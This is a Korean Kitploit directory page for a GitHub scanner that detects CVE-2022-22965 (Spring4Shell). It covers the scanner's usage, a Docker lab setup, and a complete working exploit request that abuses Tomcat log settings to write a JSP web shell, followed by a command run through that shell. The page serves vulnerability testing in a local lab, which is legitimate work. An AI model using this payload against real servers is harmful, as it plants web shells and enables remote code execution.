Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2022-22965-Spring-Core-Rce — CVE-2022-22965 일괄 무손상 탐지 | Kitploit
도구/GitHubGitHub/tangxiaofeng7/cve-2022-22965-spring-core-rce
Vulnerability ScannersContainer SecurityDynamic Analysis (Sandboxing)ExploitationWeb Application ExploitationPenetration Testing
GitHubtangxiaofeng7/cve-2022-22965-spring-core-rce

CVE-2022-22965-Spring-Core-Rce

CVE-2022-22965 일괄 무손상 탐지

저장소 보기
391454년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Spring-Core JDK9+ RCE

사용 설명

root@kitploit:~
╰─ ./CVE-2022-22965 -h                                                                                                                                                                                                                                            ─╯
개별 검사: ./CVE-2022-22965 -u http://127.0.0.1:8080
일괄 검사: ./CVE-2022-22965 -l url.txt 

취약점 로컬 테스트

0x01 Docker 이미지
root@kitploit:~
 docker pull vulfocus/spring-core-rce-2022-03-29
 docker run -itd -p 8080:8080 -P vulfocus/spring-core-rce-2022-03-29

-it: 입력 기능을 활성화하고 가상 터미널에 연결 -d: 컨테이너를 백그라운드에서 실행 -p: 포트 매핑

0x02 로컬 WAR 파일

WAR 파일을 로컬 webapps 디렉터리에 넣습니다. JDK를 9 이상으로 변경합니다. 여기서는 JDK11을 사용하고 Tomcat을 시작합니다. EXP 주입:

root@kitploit:~
POST / HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
suffix: %>
prefix: <%Runtime
Content-Type: application/x-www-form-urlencoded
Content-Length: 495

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di.getRuntime%28%29.exec%28request.getParameter%28%22cmd%22%29%29%3B%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell

명령 실행:

root@kitploit:~
GET /shell.jsp?cmd=open%20/System/Applications/Calculator.app HTTP/1.1
Host: 127.0.0.1:8080

도구 다운로드